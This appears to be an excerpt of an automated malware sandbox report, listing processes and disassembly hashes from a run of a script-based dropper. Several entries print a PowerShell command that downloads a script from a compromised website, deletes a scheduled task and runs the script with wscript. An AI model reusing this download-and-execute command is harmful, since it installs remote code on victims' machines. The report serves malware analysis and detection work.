                                        Start time:03:14:08
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:03:14:08
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:03:14:11
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
                                        Imagebase:0x7ff76f990000
                                        File size:235'008 bytes
                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:03:14:11
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
                                        Imagebase:0x7ff729c70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:03:15:01
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
                                        Imagebase:0x7ff729c70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:03:15:01
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:13
                                        Start time:03:15:01
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:03:15:05
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
                                        Imagebase:0x7ff76f990000
                                        File size:235'008 bytes
                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:03:15:05
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
                                        Imagebase:0x7ff729c70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:17
                                        Start time:03:16:00
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
                                        Imagebase:0x7ff729c70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:18
                                        Start time:03:16:00
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:19
                                        Start time:03:16:00
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Executed Functions

                                          Function 00007FFD9B9510C9 Relevance: .2, Instructions: 210COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1753225922.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: caf1bcfd38caf8d848cf2acf3af40ceaa2d2d3f5924cc4cdd1ab5e8c0fa64b73
                                          • Instruction ID: f4d0df149bb8fee52915fe28c699503ceb415e7d76e26f659d1f9b3b31223d2c
                                          • Opcode Fuzzy Hash: caf1bcfd38caf8d848cf2acf3af40ceaa2d2d3f5924cc4cdd1ab5e8c0fa64b73
                                          • Instruction Fuzzy Hash: B4515822B6FA9E1FEBA896EC58725B873C1EF41214B0501BFD85DC30E3EE58A9018341
                                          Function 00007FFD9B950DAE Relevance: .2, Instructions: 202COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1753225922.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f15fe38ce6926d93eef7424fd8e1f5847ec020f151f2547497405ea9628a15e
                                          • Instruction ID: d41441d241823b17264be37856c42d8c47bf8fd56542a279679db04ced3fb43a
                                          • Opcode Fuzzy Hash: 0f15fe38ce6926d93eef7424fd8e1f5847ec020f151f2547497405ea9628a15e
                                          • Instruction Fuzzy Hash: C8513722B6FA8E1BEBB997AC18712B867C1DF56B10B5900BEC85DC71E2DD08A8458241
                                          Function 00007FFD9B950DFA Relevance: .1, Instructions: 122COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1753225922.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aa6471a9636f38f36b34fd90c4693920fdeb4564d19116ed28ff0d4e10faa49a
                                          • Instruction ID: 022c0124524fedd701184097d0541e0abac6647a8d56cb1a9c95db8fea1c8618
                                          • Opcode Fuzzy Hash: aa6471a9636f38f36b34fd90c4693920fdeb4564d19116ed28ff0d4e10faa49a
                                          • Instruction Fuzzy Hash: 49312313F6FA8F1BF7B997E818711B86AC1DF52B50B6900BED85DC21E3DD486C884201
                                          Function 00007FFD9B951117 Relevance: .1, Instructions: 118COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1753225922.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c931f60b236f1d2e798201effe5a308b862ad69528044cf49ca062d9a6e17fe6
                                          • Instruction ID: ec399f4ee69380b234e211d9af177fb5ad5ba6d467a23cc70758ceaa0d2606d9
                                          • Opcode Fuzzy Hash: c931f60b236f1d2e798201effe5a308b862ad69528044cf49ca062d9a6e17fe6
                                          • Instruction Fuzzy Hash: 03312622F6FA9E1BEB7896E818B11B877C1EF51258B4901FED85DC20E3DD58A9418201
                                          Function 00007FFD9B884575 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1752942863.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94b56fdebe38f4091b5f4d14db650b3dc458cea6429c722bb5174eba508e340c
                                          • Instruction ID: 1e0f54c3fbc465ffd732753183a7a950ead1aafea9aff67e4266b4ec4adc39f1
                                          • Opcode Fuzzy Hash: 94b56fdebe38f4091b5f4d14db650b3dc458cea6429c722bb5174eba508e340c
                                          • Instruction Fuzzy Hash: 0701A73120CB0C8FD748EF0CE451AA6B3E0FB89360F10056EE59AC36A1DA32E881CB41

                                          Executed Functions

                                          Function 00007FFD9B8733B5 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1883745333.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ffd9b870000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 527bb615dc0b06557cbd520aad4c6d905f264af35e826118e4b835919ae47a3d
                                          • Instruction ID: 240e77624845bd21eb498471991253802ac2a52bcd73a2482a697d82a952278d
                                          • Opcode Fuzzy Hash: 527bb615dc0b06557cbd520aad4c6d905f264af35e826118e4b835919ae47a3d
                                          • Instruction Fuzzy Hash: 9201A73020CB0C4FD748EF0CE451AA6B3E0FB89324F10056DE58AC36A1DA32E882CB42